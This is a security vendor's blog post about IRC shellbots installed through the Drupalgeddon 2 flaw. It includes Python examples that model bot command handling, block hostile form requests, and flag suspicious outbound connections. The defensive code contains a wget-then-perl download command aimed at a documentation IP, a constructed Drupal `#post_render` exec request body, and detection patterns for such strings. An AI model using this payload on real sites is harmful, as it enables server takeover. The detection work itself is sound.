1 Feb, 2021

IRC Shellbot Injection Can Take Control of Your Site

Without website monitoring and a Web application firewall (WAF), a website can be taken over by a shellbot that receives its orders over Internet Relay Chat (IRC). A shellbot could create or alter files, communicate with a remote server, or download malware.
Shell injection seriously compromises a website. A successful attack lets an intruder run arbitrary commands on the server. Files can be changed or added. Private information can be sent to a third party. Recently, we've seen attacks that inject or upload an IRC bot by taking advantage of a Drupal CMS vulnerability. Quttera ThreatSign helps to keep your network safe from this and many other attacks.
Shell Injection Attacks
The attack covered here is an instance of the category known as injection attacks. They come in many forms, the common feature being that the server handles untrusted input in a way that lets an attacker run code or commands of their choosing on it.

Shell injection attacks are among the most dangerous. They let an intruder run whatever commands they like on the target system. The name comes from the idea of running or gaining access to a command shell such as Bash or C Shell, but it's also applied to threats that don't strictly use a command shell.

They're generally two-stage attacks. The first step is to gain a foothold in the system that lets the intruder run commands. The second is to enter and run commands that will alter a website, steal information, or do other things for the intruder's benefit. Once the backdoor is in place, it could remain present for months while the intruder uses it intermittently. Keeping the amount of use low helps to avoid detection.

An Internet Relay Chat shellbot is one way in which intruders can gain persistent access to a server. Other channels are possible.
IRC Shellbots
The popularity of IRC peaked around 2005. Today, Web services such as Discord and Zoom chat have largely replaced it. While it isn't as popular as it used to be, it's still widely used. A moderately experienced Linux administrator can get a server installed and running in less than an hour. Many clients are available for visitors to connect to a server and start talking with each other.

The protocol is based on a philosophy of openness. Most servers don't require a password to connect. Visitors assign themselves nicknames. There's no such thing as an authenticated user identity. Operators can kick trolls and spammers off and block IP addresses, but keeping anyone from coming back is hard. Many servers support TLS connections, but TLS only protects the connection from eavesdropping and tampering; it does nothing to establish who is on the other end.

IRC accepts connections from bots as well as live users. Bots respond when addressed in certain ways. Some provide entertainment. Some spam.

An ordinary bot connects as a client, but some run on the server side, providing services. For instance, the widely used NickServ service lets users register a nickname and reclaim it with a password.

Typically, a user communicates with a service by sending it a /msg command. For example, a user can set a NickServ password with

/msg NickServ set password mypassword

The most powerful kind of IRC bot is the shellbot. It connects to an IRC server as a client, joins a channel, and executes the commands it receives there in a command shell on the machine where it runs. It should accept commands only from authorized users. Some systems use IRC just as a way to run shellbots. They give devices a low-overhead way to communicate with each other. IoT devices often use them because of their minimal system requirements.

The danger is that an intruder might find a way to install an unauthorized shellbot. If no human ever looks at the channel or at the processes on the host, it could go unnoticed. A shellbot can be a full backdoor. It could create or alter files, communicate with a remote server, or download malware. The only limits are the permissions of the account it runs under, which for an injected bot is usually the Web server's own user.
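The following is an added example, not code from the page or from any real bot family, modelling how a shellbot turns channel traffic into shell commands and where the authorization check belongs. It parses raw IRC lines in RFC 1459 framing, extracts the sender's `nick!user@host` prefix, and decides whether the bot would run the command. The trigger word `!sh`, the hostmask allowlist format, and the sample traffic are all assumptions; nothing is executed, the model only returns what a bot would do.

```python
import re
from fnmatch import fnmatchcase

# RFC 1459 framing: [':' prefix ' '] command [' ' param ...] [' :' trailing]
_MSG_RE = re.compile(
    r'^(?::(?P<prefix>\S+) )?(?P<command>\S+)'
    r'(?P<params>(?: [^:\s]\S*)*)'
    r'(?: :(?P<trailing>.*))?$'
)

def parse_irc_line(line):
    """Split one raw line from the server into (prefix, COMMAND, [params...])."""
    m = _MSG_RE.match(line.rstrip("\r\n"))
    if not m:
        raise ValueError("not an IRC message: %r" % line)
    params = m.group("params").split()
    if m.group("trailing") is not None:
        params.append(m.group("trailing"))
    return m.group("prefix"), m.group("command").upper(), params

def split_prefix(prefix):
    """'nick!user@host' -> (nick, user, host); servers send a bare name, so user/host may be None."""
    m = re.match(r'^([^!@]+)(?:!([^@]+))?(?:@(.+))?$', prefix or "")
    return m.groups() if m else (prefix, None, None)

class ShellbotModel:
    """What a shellbot does with each inbound line, minus the actual execution.
    An empty allowlist reproduces the injected bots' behaviour: anyone who can
    type in the channel commands it."""
    TRIGGER = "!sh"   # assumed trigger word; every real bot family uses its own

    def __init__(self, nick, channel, allowed_masks=()):
        self.nick = nick
        self.channel = channel
        self.allowed_masks = tuple(allowed_masks)   # glob patterns such as 'admin!*@10.0.0.*'

    def authorized(self, prefix):
        if not self.allowed_masks:          # no check at all: the backdoor case
            return True
        nick, user, host = split_prefix(prefix)
        full = "%s!%s@%s" % (nick, user or "", host or "")
        return any(fnmatchcase(full, mask) for mask in self.allowed_masks)

    def handle(self, line):
        """Return ('run', shell_command), ('deny', shell_command) or None (not a command)."""
        prefix, command, params = parse_irc_line(line)
        if command != "PRIVMSG" or len(params) != 2:
            return None
        target, text = params
        if target not in (self.channel, self.nick):
            return None
        if not text.startswith(self.TRIGGER + " "):
            return None
        shell_command = text[len(self.TRIGGER) + 1:]
        verdict = "run" if self.authorized(prefix) else "deny"
        return (verdict, shell_command)

# Constructed traffic, as the bot would read it from its socket (not a real capture).
SAMPLE_LINES = [
    "PING :irc.example.net",
    ":admin!ops@10.0.0.4 PRIVMSG #ops :!sh uptime",
    ":mallory!~m@198.51.100.9 PRIVMSG #ops :!sh wget http://203.0.113.5/x.pl -O /tmp/x.pl",
    ":mallory!~m@198.51.100.9 PRIVMSG #other :!sh id",
    ":admin!ops@10.0.0.4 PRIVMSG #ops :hello everyone",
]

def run_model(allowed_masks=()):
    """Feed SAMPLE_LINES to a bot sitting in #ops and return its verdict per line."""
    bot = ShellbotModel("x86srv", "#ops", allowed_masks)
    return [bot.handle(line) for line in SAMPLE_LINES]

if __name__ == "__main__":
    for label, masks in (("open bot", ()), ("allowlisted bot", ("admin!*@10.0.0.*",))):
        print(label, run_model(masks))
```

With no allowlist the bot runs whatever `mallory` types in the channel, which is exactly the situation the page describes: the intruder only needs to join and speak. A hostmask allowlist stops that line, but it is still a weak control on an open network, because a nickname can be taken by anyone while its owner is offline and the host part can be cloaked or spoofed; a bot that must be administered over IRC should additionally demand a password or a NickServ identification check before it runs anything.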
The "Drupalgeddon" Shellbot
A shellbot attack almost always requires a vulnerability to exploit so that the attacker can install the bot. In the case we discovered, the weakness was one in old versions of Drupal, targeted by an exploit known as "Drupalgeddon 2" (the original "Drupalgeddon" was a 2014 SQL injection flaw). In the CVE repository, it's more formally known as CVE-2018-7600. It was publicly disclosed on March 28, 2018, and a patch was released on the same day. Some servers still haven't been patched. It's a high-risk weakness since it's easy to exploit, no authentication is required, and it lets the attacker run arbitrary code on the server, so all the data on the website is at risk.

The vulnerability was found in versions 6, 7, and 8 of Drupal. Patches were made available for all of these versions. Drupal 6 was already at end of life, but a patch was released because of the severity of the problem. Drupal 7.58 and 8.5.1 and all later releases contain the fix, so a current installation of either branch is safe against the attack.

The vulnerability itself only lets the attacker run code of their choosing; it's the attacker's payload that installs the backdoor shellbot on the server running Drupal. The next step is to keep a channel open to that backdoor. There are several ways to do this. In this case, Internet Relay Chat was the channel: the bot connects out to an IRC server the intruder controls and waits in a channel for commands. Because the connection is outbound, it passes through firewalls that only restrict inbound traffic, and because IRC servers don't normally require authentication, the intruder just has to join the channel and enter the appropriate commands.

The attack that we caught originated from a host belonging to a Serbian ISP. The injected exploit utilized the Drupal vulnerability to execute the wget command on the server. It downloads files from another IP address and then uses Perl to execute them, setting up the shellbot.
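As an added example, not Quttera's code and not Drupal's, here is the request-level check that would have stopped the injection described above. The mechanism behind CVE-2018-7600 is that form input keys beginning with `#` were passed into Drupal's render system, where keys such as `#post_render` name callbacks; Drupal's own fix added a request sanitizer that drops any incoming key starting with `#`. The example applies that rule to a form body and, as a second, heuristic indicator labelled as such, flags values that fetch a file and hand it to an interpreter, the wget-then-Perl pattern seen in this attack. The two request bodies are constructed for the example, not captures, and the IP address is a documentation address.

```python
import re
from urllib.parse import parse_qsl

def key_segments(key):
    """Split a PHP-style nested key: 'mail[#post_render][]' -> ['mail', '#post_render', '']."""
    head, _, rest = key.partition("[")
    segments = [head]
    if rest:
        segments += [s.rstrip("]") for s in rest.split("[")]
    return segments

def has_hash_key(key):
    """True if any segment of the key path starts with '#': legitimate form input never does."""
    return any(seg.startswith("#") for seg in key_segments(key))

# Heuristic (an assumption for this example, not a rule from the page): fetch a file, then
# hand it to an interpreter. Expect false positives on free-text fields; pair it with the key check.
_DOWNLOAD_EXEC = re.compile(r'\b(?:wget|curl)\b.*\b(?:perl|php|python|sh|bash)\b', re.S)

def inspect_request(query, body):
    """Return a list of (reason, key, value) findings; an empty list means no indicator fired."""
    findings = []
    for source, raw in (("query", query), ("body", body)):
        for key, value in parse_qsl(raw, keep_blank_values=True):
            if has_hash_key(key):
                findings.append(("render-array key in " + source, key, value))
            if _DOWNLOAD_EXEC.search(value):
                findings.append(("download-and-execute string in " + source, key, value))
    return findings

def should_block(query, body):
    """WAF decision: block the request if any indicator fired."""
    return bool(inspect_request(query, body))

def sanitize(raw):
    """What the Drupal fix does instead of blocking: drop '#'-keys and keep the rest."""
    return [(k, v) for k, v in parse_qsl(raw, keep_blank_values=True) if not has_hash_key(k)]

# Constructed request bodies (not captures), both aimed at Drupal's user registration form.
BENIGN_BODY = "form_id=user_register_form&mail=alice%40example.org&name=alice"
# Decoded: form_id=user_register_form&mail[#post_render][]=exec
#          &mail[#markup]=wget http://203.0.113.5/x.pl -O /tmp/x.pl; perl /tmp/x.pl
HOSTILE_BODY = (
    "form_id=user_register_form"
    "&mail%5B%23post_render%5D%5B%5D=exec"
    "&mail%5B%23markup%5D=wget+http%3A%2F%2F203.0.113.5%2Fx.pl+-O+%2Ftmp%2Fx.pl%3B+perl+%2Ftmp%2Fx.pl"
)

if __name__ == "__main__":
    for name, body in (("benign", BENIGN_BODY), ("hostile", HOSTILE_BODY)):
        print(name, "block" if should_block("", body) else "allow")
        for reason, key, value in inspect_request("", body):
            print("   ", reason, "->", key, "=", value)
    print("sanitized hostile body:", sanitize(HOSTILE_BODY))
```

The key check is the precise one: a `#` segment in a submitted parameter name has no legitimate use in a Drupal form, so blocking on it carries no false-positive cost, which is why Drupal's patch could simply strip such keys from every request. The download-and-execute regex is only a secondary signal and should be scored, not blocked on alone.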
Protection Against the Attack
A well-maintained server isn’t likely to fall victim to this attack. There are two main points that can be strengthened to frustrate intruders.

First, keep all server software up to date. The Drupalgeddon 2 vulnerability and its patch are nearly three years old. A regularly updated CMS won't be open to the attack. Likewise, Web server software, plugins, PHP versions, themes, and modules need to be kept up to date.

System management is imperfect, of course. It's always possible to let updates and protections slip. Sometimes software can't be updated because of dependencies or the limitations of an old machine. New vulnerabilities are constantly discovered, and you can't always patch them before someone exploits them. For comprehensive Web security, you should have Quttera's ThreatSign Website Protection & Malware Cleanup. Its Web Application Firewall blocks hostile requests, including Drupalgeddon injection attempts. The ThreatSign monitoring service looks for signs of improper activity and will discover connections to remote command and control servers.
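The host-side half of monitoring, as an added example that is not ThreatSign's code: an injected shellbot has to hold an outbound TCP connection to its command-and-control server, and on a Linux Web server that connection is visible in `ss -tnp` output together with the process that owns it. The example parses that output and flags two things, a peer port in the usual IRC range (6660 to 6669, 6697, 7000) and an outbound socket owned by an interpreter such as `perl`, which is how the bot in this attack was launched. The sample output is constructed for the example and the port list and process names are heuristics, not a complete signature.

```python
import re
from collections import namedtuple

Conn = namedtuple("Conn", "state local_host local_port peer_host peer_port process pid")

# One data row of `ss -tnp`: STATE RECV-Q SEND-Q LOCAL:PORT PEER:PORT [users:(("name",pid=N,fd=N))]
_ROW = re.compile(r'^(?P<state>[A-Z][A-Z0-9-]+)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<peer>\S+)(?P<rest>.*)$')
_PROC = re.compile(r'users:\(\("(?P<name>[^"]+)",pid=(?P<pid>\d+)')

def _split_endpoint(endpoint):
    """'10.0.0.5:443' or '[::1]:6667' -> (host, port); port is None for '*'."""
    host, _, port = endpoint.rpartition(":")
    return host, (int(port) if port.isdigit() else None)

def parse_ss(output):
    """Parse the data rows of `ss -tnp`; the header line does not match and is skipped."""
    conns = []
    for line in output.splitlines():
        m = _ROW.match(line.strip())
        if not m:
            continue
        lhost, lport = _split_endpoint(m.group("local"))
        phost, pport = _split_endpoint(m.group("peer"))
        p = _PROC.search(m.group("rest"))
        conns.append(Conn(m.group("state"), lhost, lport, phost, pport,
                          p.group("name") if p else None,
                          int(p.group("pid")) if p else None))
    return conns

IRC_PORTS = set(range(6660, 6670)) | {6697, 7000}          # common, not exhaustive
INTERPRETERS = {"perl", "python", "python2", "python3", "php", "sh", "bash", "dash"}

def suspicious(conns):
    """Return [(conn, [reasons...])] for connections worth a closer look."""
    findings = []
    for c in conns:
        reasons = []
        if c.peer_port in IRC_PORTS:
            reasons.append("peer port %d is a common IRC port" % c.peer_port)
        if c.process in INTERPRETERS:
            reasons.append("socket held by interpreter %r (pid %s)" % (c.process, c.pid))
        if reasons:
            findings.append((c, reasons))
    return findings

# Constructed `ss -tnp` output for a Web server with an injected bot (not a real capture).
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port   Peer Address:Port    Process
ESTAB  0      0      10.0.0.5:443         198.51.100.20:51234  users:(("apache2",pid=1120,fd=12))
ESTAB  0      0      127.0.0.1:46210      127.0.0.1:3306       users:(("php-fpm7.4",pid=1187,fd=9))
ESTAB  0      0      10.0.0.5:22          192.0.2.10:50022     users:(("sshd",pid=1301,fd=4))
ESTAB  0      0      10.0.0.5:43210       203.0.113.7:6667     users:(("perl",pid=2417,fd=3))
ESTAB  0      0      10.0.0.5:43388       203.0.113.7:8080     users:(("perl",pid=2417,fd=5))
"""

def scan(output=SAMPLE_SS):
    return suspicious(parse_ss(output))

if __name__ == "__main__":
    for conn, reasons in scan():
        print("%s -> %s:%s" % (conn.process, conn.peer_host, conn.peer_port))
        for r in reasons:
            print("   ", r)
```

The second `perl` connection, to port 8080, is the important case: bots routinely use non-standard ports, so the port list alone would miss it, while "an interpreter owned by the Web server's user holding an outbound socket" catches both. Run `ss -tnp` as root, since otherwise the process column is blank for sockets owned by other users, and treat any hit as a reason to look at the process's command line and open files rather than as proof by itself.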

Every website is a target for online criminals. Quttera ThreatSign helps you to stay safe from their attacks. Multiple plans are available to suit your budget and security requirements.